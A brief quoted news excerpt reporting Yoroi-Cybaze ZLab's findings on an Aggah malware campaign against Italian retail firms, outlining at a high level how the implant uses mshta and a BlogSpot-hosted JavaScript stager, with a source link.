Experts from Yoroi-Cybaze ZLab have spotted new attack attempts directed to some Italian companies operating in the Retail sector linked to Aggah campaign. The first part of this initial implant aims to kill the Word and Excel processes. The malicious code within the PPA abuses the Microsoft mshta utility to download a web page from the BlogSpot platform. It uses the same trick from the past: hiding the javascript stager code inside the web page, an ad hoc code snippet which will be interpreted and executed only by the MSHTA engine.”]
Source: https://securityaffairs.co/wordpress/96887/malware/aggah-botnet.html

